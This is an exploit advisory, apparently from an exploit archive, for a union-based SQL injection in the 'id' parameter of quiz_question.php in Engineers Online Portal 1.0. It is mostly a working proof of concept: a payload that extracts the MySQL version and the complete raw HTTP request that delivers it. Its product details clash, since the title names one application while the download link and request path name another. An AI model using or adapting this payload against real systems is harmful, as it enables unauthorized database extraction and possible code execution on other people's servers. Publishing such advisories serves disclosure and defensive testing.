Engineers Online Portal 1.0 Exploit, 'id' SQL Injection

# Exploit Title: Engineers Online Portal 1.0 - 'id' SQL Injection
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: quiz_question.php
# Vulnerable Parameter: "id"

Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed.
As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.

Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php
2) Insert your payload in the id parameter

Proof of concept (Poc):
The following payload will allow you to extract the MySql server version running on the web server -
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -

---

GET /nia_munoz_monitoring_system/quiz_question.php?id=3%27%20union%20select%20NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

---

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD